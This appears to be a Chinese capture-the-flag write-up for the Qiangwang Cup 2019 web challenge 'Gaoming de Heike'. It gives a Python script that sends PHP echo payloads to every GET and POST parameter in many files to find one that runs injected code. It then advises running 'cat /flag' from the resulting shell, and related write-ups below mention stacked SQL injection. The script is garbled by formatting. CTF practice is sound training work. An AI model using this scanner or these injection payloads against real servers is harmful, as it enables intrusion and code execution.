強網杯 2019 高明的黑客 wp

2021-10-24 12:04:20 字數 1984 閱讀 7516

編寫python**

import os

import requests

import re

filepath =

"d:\\phpstudy\\phpstudy_pro\\www\\src\\"

os.chdir(filepath)

files = os.listdir(filepath)

#files.reverse()

session = requests.session(

)session.keep_alive =

false

defget_content

(file):

print

('finding: '

+file

)with

open

(file

,encoding=

'utf-8'

)as f:

gets =

list

(re.findall(

'\$_get\[\'(.*?)\'\]'

, f.read())

) posts =

list

(re.findall(

'\$_post\[\'(.*?)\'\]'

, f.read())

) data =

params =

for m in gets:

params[m]

="echo 'corgi';"

for n in posts:

data[n]

="echo 'corgi';"

url =

''+file

req = session.post(url, data=data, params=params)

req.close(

)

req.encoding =

'utf-8'

content = req.text

if"corgi"

in content:

print

(content)

flag =

0for a in gets:

req = session.get(url+

'?%s='

%a+"echo 'corgi';"

) content = req.text

req.close()if

"corgi"

in content:

flag =

1break

if flag !=1:

for b in posts:

req = session.post(url, data=

) content = req.text

req.close()if

"corgi"

in content:

break

if flag ==1:

print

('get: '

+a)else

:print

('post: '

+b)if

"__main__"

== __name__:

for i in files:

get_content(i)

注意事項:

1.所有引數一下子執行否則請求的數量會特別大

2.沒寫多執行緒可以開兩個指令碼 乙個正著掃瞄乙個倒著掃瞄

3.自己本地搭**請求會快得多

4.請求和檔案及時關閉避免占用過多記憶體

得到shell後直接cat /flag

強網杯 2019 web題 高明的黑客

復現環境 buuoj.cn 這裡貼出趙師傅的python指令碼 膜一波 import os import threading from concurrent.futures.thread import threadpoolexecutor import requests session reques...

原題復現 強網杯 2019 WEB高明的黑客

簡介 原題復現 考察知識點 python 編寫能力。線上平台 北京聯合大學公開的ctf平台 榆林學院內可使用信安協會內部的ctf訓練平台找到此題 簡介 開啟 發現這些 有get pos 還有var dump 每個頁面都有很多看wp說這是shell 因為很多都不能用所以要編寫乙個能檢測利用的py v1...

BUUCTF 強網杯 2019 隨便注wp

知識點 堆疊注入。用簡單的話來說就是在sql語句中分號 標誌著一句話的結束,如果在乙個sql語句後新增分號 並構造乙個新的sql語句,那麼之前的sql語句和自己所構造的sql語句都會執行,因此造成了sql注入。這種注入方法叫堆疊注入。進入題目,看到輸入框,嘗試sql字元型注入1 or 1 1,發現存...